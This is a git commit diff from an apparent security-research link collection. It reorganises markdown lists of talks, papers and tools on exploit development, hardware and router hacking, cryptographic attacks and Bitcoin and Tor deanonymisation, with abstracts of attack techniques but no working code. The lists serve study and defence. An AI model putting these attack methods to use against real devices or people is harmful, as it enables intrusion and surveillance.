Browse Source

Cleared some things up, added some stuff, changed some pages ToCs to better reflect content.

Added some sections to break down content into appropriate categorization for future ease.
pull/8/head
root 5 years ago
parent
commit
5b6c68bf4b
166 changed files with 1142 additions and 15926 deletions
  1. +7
    -0
      Draft/Anonymity Opsec Privacy -.md
  2. +2
    -1
      Draft/CTFs & Wargames -.md
  3. +2
    -2
      Draft/Car Hacking.md
  4. +20
    -5
      Draft/CryptoCurrencies.md
  5. +8
    -3
      Draft/Cryptography & Encryption.md
  6. +0
    -30
      Draft/Cryptography & Encryption/Linux Systems.txt
  7. +0
    -28
      Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  8. +0
    -48
      Draft/Cryptography & Encryption/cull.txt
  9. +44
    -51
      Draft/Embedded Device & Hardware Hacking -.md
  10. +81
    -63
      Draft/Exploit Development.md
  11. +0
    -0
      Draft/Exploit_Dev_Lab.txt
  12. +6
    -6
      Draft/Forensics Incident Response.md
  13. +2
    -2
      Draft/Fuzzing Bug Hunting.md
  14. +2
    -1
      Draft/Game Hacking.md
  15. +0
    -0
      Draft/Gamma_group_hack_writeup.txt
  16. +17
    -23
      Draft/Interesting Things Useful stuff.md
  17. +0
    -0
      Draft/Lab for Practicing Exploit Writing.txt
  18. +175
    -142
      Draft/Network Attacks & Defenses.md
  19. +0
    -92
      Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt
  20. +8
    -0
      Draft/Network Security Monitoring & Logging.md
  21. +93
    -55
      Draft/Open Source Intelligence.md
  22. +57
    -21
      Draft/Privilege Escalation & Post-Exploitation.md
  23. +80
    -13
      Draft/Red-Teaming.md
  24. +9
    -0
      Draft/Reverse Engineering.md
  25. +11
    -2
      Draft/SCADA.md
  26. +0
    -3
      Draft/Simulations/SCADA.txt
  27. +13
    -13
      Draft/Social Engineering.md
  28. +77
    -53
      Draft/System Internals Windows and Linux Internals Reference.md
  29. +25
    -6
      Draft/Web & Browsers.md
  30. +18
    -14
      Draft/Wireless Networks & RF.md
  31. +0
    -0
      Draft/detect_virtual_box_c_prog.txt
  32. +250
    -378
      Draft/things-added.md
  33. +135
    -40
      README.md
  34. +0
    -104
      _site/Draft/Draft/Anonymity Opsec Privacy -.md
  35. +0
    -27
      _site/Draft/Draft/Anti-Forensics.md
  36. +0
    -165
      _site/Draft/Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics – Michael.txt
  37. +0
    -421
      _site/Draft/Draft/Attacking Defending Android -.md
  38. +0
    -135
      _site/Draft/Draft/Attacking Defending iOS -.md
  39. +0
    -148
      _site/Draft/Draft/BIOS UEFI Attacks Defenses.md
  40. +0
    -34
      _site/Draft/Draft/Basic Security Information.md
  41. +0
    -54
      _site/Draft/Draft/Building A Pentest Lab.md
  42. +0
    -50
      _site/Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
  43. +0
    -113
      _site/Draft/Draft/CTFs & Wargames -.md
  44. +0
    -175
      _site/Draft/Draft/Cheat sheets reference pages Checklists -.md
  45. +0
    -11
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt
  46. +0
    -112
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
  47. +0
    -62
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/Ncat.txt
  48. +0
    -119
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
  49. +0
    -242
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/Nmap.txt
  50. +0
    -1
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
  51. +0
    -57
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
  52. +0
    -3
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/ToDO.txt
  53. +0
    -98
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
  54. +0
    -111
      _site/Draft/Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
  55. +0
    -67
      _site/Draft/Draft/Client Side Attacks.md
  56. +0
    -36
      _site/Draft/Draft/Con Videos Stuff -.md
  57. +0
    -82
      _site/Draft/Draft/Counter Surveillance.md
  58. +0
    -154
      _site/Draft/Draft/Courses & Training -.md
  59. +0
    -20
      _site/Draft/Draft/CryptoCurrencies.md
  60. +0
    -135
      _site/Draft/Draft/Cryptography & Encryption.md
  61. +0
    -30
      _site/Draft/Draft/Cryptography & Encryption/Linux Systems.txt
  62. +0
    -28
      _site/Draft/Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  63. +0
    -48
      _site/Draft/Draft/Cryptography & Encryption/cull.txt
  64. +0
    -69
      _site/Draft/Draft/Darknets -.md
  65. +0
    -82
      _site/Draft/Draft/Data AnalysisVisualization.md
  66. +0
    -51
      _site/Draft/Draft/Disclosure.md
  67. +0
    -22
      _site/Draft/Draft/Disinformation.md
  68. +0
    -83
      _site/Draft/Draft/Documentation & Reports.md
  69. +0
    -0
      _site/Draft/Draft/Draft.rtf
  70. +0
    -318
      _site/Draft/Draft/Embedded Device & Hardware Hacking -.md
  71. +0
    -45
      _site/Draft/Draft/Exfiltration.md
  72. +0
    -557
      _site/Draft/Draft/Exploit Development.md
  73. +0
    -50
      _site/Draft/Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
  74. +0
    -159
      _site/Draft/Draft/Forensics Incident Response.md
  75. +0
    -257
      _site/Draft/Draft/Forensics Incident Response/add cull.txt
  76. +0
    -160
      _site/Draft/Draft/Frameworks.md
  77. +0
    -19
      _site/Draft/Draft/Frameworks/Metasploit Reference.txt
  78. +0
    -67
      _site/Draft/Draft/Frameworks/Meterpreter Scripts and Description.txt
  79. +0
    -110
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  80. +0
    -832
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Enumeration.txt
  81. +0
    -315
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  82. +0
    -0
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
  83. +0
    -29
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Password Cracking.txt
  84. +0
    -73
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Penetration.txt
  85. +0
    -128
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/VoIP Security.txt
  86. +0
    -67
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
  87. +0
    -231
      _site/Draft/Draft/Frameworks/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
  88. +0
    -271
      _site/Draft/Draft/Frameworks/Post Exploitation with Metasploit.txt
  89. +0
    -144
      _site/Draft/Draft/Fuzzing Bug Hunting.md
  90. +0
    -25
      _site/Draft/Draft/Google Hacking.md
  91. +0
    -6
      _site/Draft/Draft/Home Security.md
  92. +0
    -100
      _site/Draft/Draft/Honeypots -.md
  93. +0
    -195
      _site/Draft/Draft/Interesting Things Useful stuff.md
  94. +0
    -409
      _site/Draft/Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt
  95. +0
    -48
      _site/Draft/Draft/Links.md
  96. +0
    -87
      _site/Draft/Draft/Lockpicking -.md
  97. +0
    -88
      _site/Draft/Draft/Logging - Combine with NSM.md
  98. +0
    -22
      _site/Draft/Draft/MITM.md
  99. +0
    -353
      _site/Draft/Draft/Malware.md
  100. +0
    -182
      _site/Draft/Draft/Malware/Detect Virtualbox C prog.txt

+ 7
- 0
Draft/Anonymity Opsec Privacy -.md View File

@ -45,6 +45,12 @@ https://github.com/NullHypothesis/exitmap/issues/37
[Deanonymizing Windows users and capturing Microsoft and VPN accounts](https://medium.com/@ValdikSS/deanonymizing-windows-users-and-capturing-microsoft-and-vpn-accounts-f7e53fe73834)
[The Paranoid's Bible: An anti-dox effort.](https://paranoidsbible.tumblr.com/)
### <a name="Articles">Articles</a>
@ -135,6 +141,7 @@ https://github.com/NullHypothesis/exitmap/issues/37
[De-Anonymizing Alt.Anonymous. Messages - Defcon21 - Tom Ritter](https://www.youtube.com/watch?v=_Tj6c2Ikq_E)
[PISSED: Privacy In a Surveillance State Evading Detection - Joe Cicero - CYPHERCON11 ](https://www.youtube.com/watch?v=keA3WcKwZwA)


+ 2
- 1
Draft/CTFs & Wargames -.md View File

@ -9,7 +9,7 @@
Cull
#### Cull
[CTF Scripts and PyInstaller (.py > .exe) [CTF Scripts and PyInstaller (.py > .exe) ](http://www.primalsecurity.net/ctf-scripts-and-pyinstaller-py-exe/)
[AppJailLauncher](https://github.com/trailofbits/AppJailLauncher)
@ -27,6 +27,7 @@ pentestlab
root-me
#### end cull
### <a name="general">General</a>
[ctf-time](https://ctftime.org/)


+ 2
- 2
Draft/Car Hacking.md View File

@ -55,9 +55,9 @@ Seriously check this first ---> [Awesome Vehicle Security List(github awesome li
[Adventures in Automotive Networks and Control Units](https://www.youtube.com/watch?v=MEYCU62yeYk&app=desktop)
* Charlie Miller & Chris Valasek
[Broadcasting your attack: Security testing DAB radio in cars - Andy Davis](http://2015.ruxcon.org.au/assets/2015/slides/Broadcasting-your-attack-Security-testing-DAB-radio-in-cars.pdf)
[A Survey of Remote Automotive Attack Surfaces - Black Hat USA 2014](https://www.youtube.com/watch?v=mNhFGJVq2HE)


+ 20
- 5
Draft/CryptoCurrencies.md View File

@ -1,20 +1,35 @@
##CryptoCurrencies
## CryptoCurrencies
######I don’t know.
###### I don’t know.
Bitcoin - What other alt coins?
Bitcointalk
/r/bitcoin
### General
[cryptocurrency](https://github.com/kilimchoi/cryptocurrency)
* Overview of top cryptocurrencies
### Bitcoin
[Bitcointalk](https://bitcointalk.org/)
[/r/bitcoin](https://reddit.com/r/bitcoin)
### Ethereum
[The Ether Thief](https://www.bloomberg.com/features/2017-the-ether-thief/)
### Talks/Presentations
[Deanonymisation of Clients in Bitcoin P2P Network](http://orbilu.uni.lu/bitstream/10993/18679/1/Ccsfp614s-biryukovATS.pdf)
* We present an effcient method to deanonymize Bitcoin users, which allows to link user pseudonyms to the IP addresses where the transactions are generated. Our techniques work for the most common and the most challenging scenario when users are behind NATs or rewalls of their ISPs. They allow to link transactions of a user behind a NAT and to distinguish connections and transactions of different users behind the same NAT. We also show that a natural countermeasure of using Tor or other anonymity services can be cut-o by abusing anti-DoS countermeasures of the Bitcoin network. Our attacks require only a few machines and have been experimentally verifed. The estimated success rate is between 11% and 60% depending on how stealthy an attacker wants to be. We propose several countermeasures to mitigate these new attacks.

+ 8
- 3
Draft/Cryptography & Encryption.md View File

@ -20,8 +20,6 @@
https://conversations.im/xeps/multi-end.html
http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
### End Cull
@ -40,6 +38,10 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
[Snake Oil Crypto Competition](https://snakeoil.cr.yp.to/)
[Lifetimes of cryptographic hash functions](http://valerieaurora.org/hash.html)
[Top 10 Developer Crypto Mistakes](https://littlemaninmyhead.wordpress.com/2017/04/22/top-10-developer-crypto-mistakes/amp/)
@ -67,7 +69,7 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
[How to Implement Crypto Poorly - Sean Cassidy](https://github.com/cxxr/talks/blob/master/2016/grrcon/How%20to%20Implement%20Crypto%20Poorly.pdf)
[CBC Byte Flipping Attack—101 Approach](http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/)
@ -202,7 +204,10 @@ http://resources.infosecinstitute.com/cbc-byte-flipping-attack-101-approach/
Applied Cryptography
### Crypto Libraries/Protocols
[OMEMO Multi-End Message and Object Encryption](https://conversations.im/omemo/)
* OMEMO is an XMPP Extension Protocol (XEP) for secure multi-client end-to-end encryption. It is an open standard based on a Double Ratchet and PEP which can be freely used and implemented by anyone. The protocol has been audited by a third party.


+ 0
- 30
Draft/Cryptography & Encryption/Linux Systems.txt View File

@ -1,30 +0,0 @@
Tcplay
From: https://github.com/bwalex/tc-play
tcplay is a free (BSD-licensed), pretty much fully featured (including multiple keyfiles, cipher cascades, etc) and stable TrueCrypt implementation.
This implementation supports mapping (opening) both system and normal TrueCrypt volumes, as well as opening hidden volumes and opening an outer volume while protecting a hidden volume. There is also support to create volumes, including hidden volumes, etc. Since version 1.1, there is also support for restoring from the backup header (if present), change passphrase, keyfile and PBKDF2 PRF function.
Since tcplay uses dm-crypt (or dm_target_crypt on DragonFly) it makes full use of any available hardware encryption/decryption support once the volume has been mapped.
It is based solely on the documentation available on the TrueCrypt website, many hours of trial and error and the output of the Linux' TrueCrypt client. As it turns out, most technical documents on TrueCrypt contain mistakes, hence the trial and error approach.
Cryptsetup
From: https://code.google.com/p/cryptsetup/
Cryptsetup is utility used to conveniently setup disk encryption based on dm-crypt kernel module.
These include plain dm-crypt volumes, LUKS volumes, loop-AES and TrueCrypt compatible format.
Project also includes veritysetup utility used to conveniently setup dm-verity block integrity checking kernel module.
LUKS is the standard for Linux hard disk encryption. By providing a standard on-disk-format, it does not only facilitate compatibility among distributions, but also provides secure management of multiple user passwords. In contrast to existing solution, LUKS stores all setup necessary setup information in the partition header, enabling the user to transport or migrate his data seamlessly.
LUKS was designed according to TKS1, a template design developed in TKS1 for secure key setup. LUKS closely reassembles the structure recommended in the TKS1 paper, but also adds meta data for cipher setup management and LUKS also supports for multiple keys/passphrases. 4
Why LUKS?
compatiblity via standardization,
secure against low entropy attacks,
support for multiple keys,
effective passphrase revocation,
free
From: https://code.google.com/p/cryptsetup/

+ 0
- 28
Draft/Cryptography & Encryption/Vids Papers Blogposts.txt View File

@ -1,28 +0,0 @@
##Resources
[Attacking and Defending Full Disk Encryption - Tom Kopchak](http://www.irongeek.com/i.php?page=videos/bsidescleveland2014/attacking-and-defending-full-disk-encryption-tom-kopchak)
[InsidePro Wiki](http://wiki.insidepro.com/index.php/Main_Page)
Here you will find a lot of useful and unique information:
Detailed descriptions of various hashing algorithms and check sums.
Source codes of those algorithms in various programming languages.
Information on the application of certain algorithms.
Description of the applications that support such hashes.
Various articles on the subject.
Useful advice on handling hashes.
Links to various online resources on the subject of recovering passwords from hashes.
And much more.
[Zero-Knowledge Proofs - An Illustrated Primer](http://blog.cryptographyengineering.com/2014/11/zero-knowledge-proofs-illustrated-primer.html?m=1)
[Applied Cryptographic Hardening](https://bettercrypto.org/static/applied-crypto-hardening.pdf)
[Instant ciphertext-only cryptnalysis of GSM encryptd communications](http://cryptome.org/gsm-crack-bbk.pdf)
[Malleability Attack against CBC Encrypted LUKS partitions](http://www.jakoblell.com/blog/2013/12/22/practical-malleability-attack-against-cbc-encrypted-luks-partitions/)
[How CryptoSystems are *Really* broken](http://www.forth.gr/onassis/lectures/pdf/How_Cryptosystems_Are_Really_Broken.pdf)
[Toward Robust Hidden Volumes using Write-Only Oblivious RAM](https://eprint.iacr.org/2014/344.pdf)
* With sensitive data being increasingly stored on mobile devices and laptops, hard disk encryption is more important than ever. In partic- ular, being able to plausibly deny that a hard disk contains certain information is a very useful and interesting research goal. However, it has been known for some time that existing “hidden volume” so- lutions, like TrueCrypt, fail in the face of an adversary who is able to observe the contents of a disk on multiple, separate occasions. In this work, we explore more robust constructions for hidden vol- umes and present HIVE, which is resistant to more powerful ad- versaries with multiple-snapshot capabilities. In pursuit of this, we propose the first security definitions for hidden volumes, and prove HIVE secure under these definitions. At the core of HIVE, we de- sign a new write-only Oblivious RAM. We show that, when only hiding writes, it is possible to achieve ORAM with optimal O (1) communication complexity and only poly-logarithmic user mem- ory. This is a significant improvement over existing work and an independently interesting result. We go on to show that our write- only ORAM is specially equipped to provide hidden volume func- tionality with low overhead and significantly increased security. Fi- nally, we implement HIVE as a Linux kernel block device to show both its practicality and usefulness on existing platforms.

+ 0
- 48
Draft/Cryptography & Encryption/cull.txt View File

@ -1,48 +0,0 @@
A (relatively easy to understand) primer on elliptic curve cryptography
http://arstechnica.com/security/2013/10/a-relatively-easy-to-understand-primer-on-elliptic-curve-cryptography/
HAVEGE [ HArdware Volatile Entropy Gathering and Expansion ]
http://www.irisa.fr/caps/projects/hipsor/
TextSecure Protocol
https://github.com/WhisperSystems/TextSecure/wiki/ProtocolV2
http://www.tau.ac.il/~tromer/acoustic/
Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPG's current implementation of RSA. The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts. We experimentally demonstrate that such attacks can be carried out, using either a plain mobile phone placed next to the computer, or a more sensitive microphone placed 4 meters away.

+ 44
- 51
Draft/Embedded Device & Hardware Hacking -.md View File

@ -3,10 +3,11 @@
https://en.wikipedia.org/wiki/Embedded_system
##### ToC
Cull
* [General](#general)
* [General Hardware Hacking](#generalhw)
* [General Hardware Articles/Writeups](#generalwriteups)
* [General Hardware Hacking Talks/Presentations](#generaltalks)
* [General Hardware Hacking Tools](#generaltools)
* [Attacking Routers](#routers)
* [Cable Modem Hacking](#modem)
* [Educational/Information on things you wouldn't find in a Dictionary](#education)
@ -37,93 +38,81 @@ http://www.sp3ctr3.me/hardware-security-resources/
http://greatscottgadgets.com/infiltrate2013/
[ThunderGate](http://thundergate.io/)
* ThunderGate is a collection of tools for the manipulation of Tigon3 Gigabit Ethernet controllers, with special emphasis on the Broadcom NetLink 57762, such as is found in Apple Thunderbolt Gigabit Ethernet adapters.
[SPI](https://trmm.net/SPI_flash)
[ISO/IEC 7816](https://en.wikipedia.org/wiki/ISO/IEC_7816)
[ISO/IEC 15693](https://en.wikipedia.org/wiki/ISO/IEC_15693)
[ISO/IEC 14443](https://en.wikipedia.org/wiki/ISO/IEC_14443)
[Attacks via physical access to USB (DMA…?)](https://security.stackexchange.com/questions/118854/attacks-via-physical-access-to-usb-dma)
#### end sort
[Can a connected USB device read all data from the USB bus?](https://security.stackexchange.com/questions/37927/can-a-connected-usb-device-read-all-data-from-the-usb-bus?rq=1)
[Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)
[Ian Douglas - Creating an Internet of Private Things](https://www.youtube.com/watch?v=4W8SkujOXi4&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe&index=8)
* The next big market push is to have the cool IoT device that’s connected to the internet. As we’ve seen from the Mirai and Switcher hacks, it’s important to embed the appropriate safeguards so that devices are not open to attack. When selecting device components there are things that should be checked for, and when you’re doing the coding and workflows, there are other things that need to be taken in to account. Although security and privacy are close cousins, they’re also different. This talk will be centered around some best security and privacy practices as well as some common errors that should be avoided.
### General
[Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)](https://p16.praetorian.com/blog/reversing-and-exploiting-embedded-devices-part-1-the-software-stack)
[Hardware Security and Trust/ECE 4451/5451: Introduction to Hardware Security and Trust](https://www.engr.uconn.edu/~tehrani/teaching/hst/)
[NSA Playset](http://www.nsaplayset.org/)
* In the coming months and beyond, we will release a series of dead simple, easy to use tools to enable the next generation of security researchers. We, the security community have learned a lot in the past couple decades, yet the general public is still ill equipped to deal with real threats that face them every day, and ill informed as to what is possible. Inspired by the NSA ANT catalog, we hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. Now you can play along with the NSA!
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
[Breaking IPMI/BMC](http://fish2.com/ipmi/how-to-break-stuff.html)
[Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)
#### end sort
### General Writeups/Articles
[Door Control Systems: An Examination of Lines of Attack](https://www.nccgroup.com/en/blog/2013/09/door-control-systems-an-examination-of-lines-of-attack/)
[Smart Parking Meters](http://uninformed.org/?v=all&a=6&t=sumry)
* Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
### General
[Reversing and Exploiting Embedded Devices: The Software Stack (Part 1)](https://p16.praetorian.com/blog/reversing-and-exploiting-embedded-devices-part-1-the-software-stack)
[Hardware Security and Trust/ECE 4451/5451: Introduction to Hardware Security and Trust](https://www.engr.uconn.edu/~tehrani/teaching/hst/)
[NSA Playset](http://www.nsaplayset.org/)
* In the coming months and beyond, we will release a series of dead simple, easy to use tools to enable the next generation of security researchers. We, the security community have learned a lot in the past couple decades, yet the general public is still ill equipped to deal with real threats that face them every day, and ill informed as to what is possible. Inspired by the NSA ANT catalog, we hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. Now you can play along with the NSA!
[Chip & PIN is Definitely Broken - Defcon 19](https://www.youtube.com/watch?v=JABJlvrZWbY)
| **NSA USB Playset - ShmooCon201** | https://www.youtube.com/watch?v=eTDBFpLYcGA
[Multiplexed Wired Attack Surfaces - Michael Ossmann & Kos - Toorcon15](https://www.youtube.com/watch?v=4QB79921Nlw)
* Manufacturers of mobile devices often multiplex several wired interfaces onto a single connector. Some of these interfaces, probably intended for test and development, are still enabled when the devices ship. We'll show you how you can get a shell on a popular mobile phone via its USB port without using a USB connection and we will release an open source tool for exploring multiplexed wired interfaces.
[Attacks via physical access to USB (DMA…?)](https://security.stackexchange.com/questions/118854/attacks-via-physical-access-to-usb-dma)
[Anti-Evil Maid](http://theinvisiblethings.blogspot.com/2011/09/anti-evil-maid.html?m=1)
[Can a connected USB device read all data from the USB bus?](https://security.stackexchange.com/questions/37927/can-a-connected-usb-device-read-all-data-from-the-usb-bus?rq=1)
[Metasploit Hardware Brdige](https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix)
* [Hardware Bridge API](http://opengarages.org/hwbridge/)
### General Talks/Presentations
[Jackson Thuraisamy & Jason Tran - Hacking POS PoS Systems](https://www.youtube.com/watch?v=-n7oJqmTUCo)
[Hardware Hacking the Easyware Way](http://www.irongeek.com/i.php?page=videos/derbycon6/417-hardware-hacking-the-easyware-way-brian-fehrman)
* Interested in hardware hacking but not quite sure where to start? Does the thought of soldering thrill you (or scare you)? Come check out this talk to see just how easy it is to jump into this exciting field of research! Many people and companies use similar models of hardware. Unlike software, these devices rarely receive security updates. Sometimes, used devices are sold without clearing the configurations and important data is left behind. After this talk, you will know how to find hidden interfaces on these devices, start searching for vulnerabilities and sensitive information, and have irresistible urges to go home and tear apart all your old networking equipment. Did we mention...live demo?
[Deconstructing the Circuit Board Sandwich DEF CON 22 - Joe Grand aka Kingpin](https://www.youtube.com/watch?v=O8FQZIPkgZM)
### <a name="generalhw">General Hardware Hacking</a>
[Multiplexed Wired Attack Surfaces - Michael Ossmann & Kos - Toorcon15](https://www.youtube.com/watch?v=4QB79921Nlw)
* Manufacturers of mobile devices often multiplex several wired interfaces onto a single connector. Some of these interfaces, probably intended for test and development, are still enabled when the devices ship. We'll show you how you can get a shell on a popular mobile phone via its USB port without using a USB connection and we will release an open source tool for exploring multiplexed wired interfaces.
[Door Control Systems: An Examination of Lines of Attack](https://www.nccgroup.com/en/blog/2013/09/door-control-systems-an-examination-of-lines-of-attack/)
[SATELLITE TV RECEIVERS: FROM REMOTE CONTROL TO ROOT SHELL - Sofiane Talmat](https://vimeo.com/album/3682874/video/148910624)
[ChipWhisperer](http://www.newae.com/chipwhisperer)
* ChipWhisperer is the first ever open-source solution that provides a complete toolchain for research and analysis of embedded hardware security. Side Channel Power Analysis, Clock Glitching, VCC Glitching, and more are all possible with this unique tool.
[NSA USB Playset - ShmooCon201](https://www.youtube.com/watch?v=eTDBFpLYcGA)
[Breaking IPMI/BMC](http://fish2.com/ipmi/how-to-break-stuff.html)
[Chip & PIN is Definitely Broken - Defcon 19](https://www.youtube.com/watch?v=JABJlvrZWbY)
[Deconstructing the Circuit Board Sandwich DEF CON 22 - Joe Grand aka Kingpin](https://www.youtube.com/watch?v=O8FQZIPkgZM)
[Ian Douglas - Creating an Internet of Private Things](https://www.youtube.com/watch?v=4W8SkujOXi4&list=PLuUtcRxSUZUpv2An-RNhjuZSJ5fjY7ghe&index=8)
* The next big market push is to have the cool IoT device that’s connected to the internet. As we’ve seen from the Mirai and Switcher hacks, it’s important to embed the appropriate safeguards so that devices are not open to attack. When selecting device components there are things that should be checked for, and when you’re doing the coding and workflows, there are other things that need to be taken in to account. Although security and privacy are close cousins, they’re also different. This talk will be centered around some best security and privacy practices as well as some common errors that should be avoided.
[The Sorcerer’s Apprentice Guide to Fault Attacks](https://eprint.iacr.org/2004/100.pdf)
* The effect of faults on electronic systems has been studied since the 1970s when it was noticed that radioactive particles caused errors in chips. This led to further research on the effect of charged particles on silicon, motivated by the aerospace industry who was becoming concerned about the effect of faults in airborne electronic systems. Since then various mechanisms for fault creation and propagation have been discovered and researched. This paper covers the various methods that can be used to induce faults in semiconductors and exploit such errors maliciously. Several examples of attacks stemming from the exploiting of faults are explained. Finally a series of countermeasures to thwart these attacks are described.
[A Survey of Remote Automotive Attack Surfaces - Black Hat USA 2014](https://www.youtube.com/watch?v=mNhFGJVq2HE)
[Smart Parking Meters](http://uninformed.org/?v=all&a=6&t=sumry)
* Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackblox secure memory card.
[SATELLITE TV RECEIVERS: FROM REMOTE CONTROL TO ROOT SHELL - Sofiane Talmat](https://vimeo.com/album/3682874/video/148910624)
[Hardware Hacking the Easyware Way](http://www.irongeek.com/i.php?page=videos/derbycon6/417-hardware-hacking-the-easyware-way-brian-fehrman)
* Interested in hardware hacking but not quite sure where to start? Does the thought of soldering thrill you (or scare you)? Come check out this talk to see just how easy it is to jump into this exciting field of research! Many people and companies use similar models of hardware. Unlike software, these devices rarely receive security updates. Sometimes, used devices are sold without clearing the configurations and important data is left behind. After this talk, you will know how to find hidden interfaces on these devices, start searching for vulnerabilities and sensitive information, and have irresistible urges to go home and tear apart all your old networking equipment. Did we mention...live demo?
### General Tools
[ThunderGate](http://thundergate.io/)
* ThunderGate is a collection of tools for the manipulation of Tigon3 Gigabit Ethernet controllers, with special emphasis on the Broadcom NetLink 57762, such as is found in Apple Thunderbolt Gigabit Ethernet adapters.
[Metasploit Hardware Brdige](https://community.rapid7.com/community/transpo-security/blog/2017/02/02/exiting-the-matrix)
* [Hardware Bridge API](http://opengarages.org/hwbridge/)
[ChipWhisperer](http://www.newae.com/chipwhisperer)
* ChipWhisperer is the first ever open-source solution that provides a complete toolchain for research and analysis of embedded hardware security. Side Channel Power Analysis, Clock Glitching, VCC Glitching, and more are all possible with this unique tool.
@ -144,8 +133,13 @@ http://greatscottgadgets.com/infiltrate2013/
[Hacking the D-Link DIR-890L](http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/)
[Multiple Vulnerabilities in BHU WiFi “uRouter”](http://blog.ioactive.com/2016/08/multiple-vulnerabilities-in-bhu-wifi.html)
#####TR-069
##### TR-069
[I Hunt TR-069 Admins - Pwning ISPs Like a Boss - Defcon 22](https://media.defcon.org/DEF%20CON%2022/DEF%20CON%2022%20video%20and%20slides/DEF%20CON%2022%20Hacking%20Conference%20Presentation%20By%20Shahar%20Tal%20-%20I%20Hunt%20TR%20-%20069%20Admins%20-%20Pwning%20ISPs%20Like%20a%20Boss%20-%20Video%20and%20Slides.m4v)
* [Related to TR-069](http://blog.3slabs.com/2012/12/a-brief-survey-of-cwmp-security.html)
@ -442,9 +436,7 @@ Chameleon Mini
###<a name="papers">Papers</a>
###<a name="papers">General Papers</a>
[Stealthy Dopant-Level Hardware Trojans](Hardware level trojans http://sharps.org/wp-content/uploads/BECKER-CHES.pdf)
* Abstract: In this paper we propose an extremely stealthy approach for implement- ing hardware Trojans below the gate level, and we evaluate their impact on the security of the target device. Instead of adding additional cir- cuitry to the target design, we insert our hardware Trojans by changing the dopant polarity of existing transistors. Since the modi ed circuit ap- pears legitimate on all wiring layers (including all metal and polysilicon), our family of Trojans is resistant to most detection techniques, includ- ing ne-grain optical inspection and checking against \golden chips". We demonstrate the e ectiveness of our approach by inserting Trojans into two designs | a digital post-processing derived from Intel's cryp- tographically secure RNG design used in the Ivy Bridge processors and a side-channel resistant SBox implementation | and by exploring their detectability and their e ects on security.
@ -464,7 +456,8 @@ Embedded Systems](http://www.cs.dartmouth.edu/~sws/pubs/bgjss12.pdf)
[Introduction to Trusted Execution Environments - Steven J. Murdoch](https://www.cl.cam.ac.uk/~sjm217/talks/rhul14tee.pdf)
[The Sorcerer’s Apprentice Guide to Fault Attacks](https://eprint.iacr.org/2004/100.pdf)
* The effect of faults on electronic systems has been studied since the 1970s when it was noticed that radioactive particles caused errors in chips. This led to further research on the effect of charged particles on silicon, motivated by the aerospace industry who was becoming concerned about the effect of faults in airborne electronic systems. Since then various mechanisms for fault creation and propagation have been discovered and researched. This paper covers the various methods that can be used to induce faults in semiconductors and exploit such errors maliciously. Several examples of attacks stemming from the exploiting of faults are explained. Finally a series of countermeasures to thwart these attacks are described.


+ 81
- 63
Draft/Exploit Development.md View File

@ -51,8 +51,6 @@ TOC
#### Sort:
[The Danger of Unrandomized Code](https://www.usenix.org/system/files/login/articles/105516-Schwartz.pdf)
Finding Opcodes
Methods of finding opcodes:
metasploit opcode DB
@ -62,62 +60,16 @@ pvefindaddr - mona.py
Corelan Exploit Series
[rex](https://github.com/shellphish/rex)
* Shellphish's automated exploitation engine, originally created for the Cyber Grand Challenge.
[Patcherex](https://github.com/shellphish/patcherex)
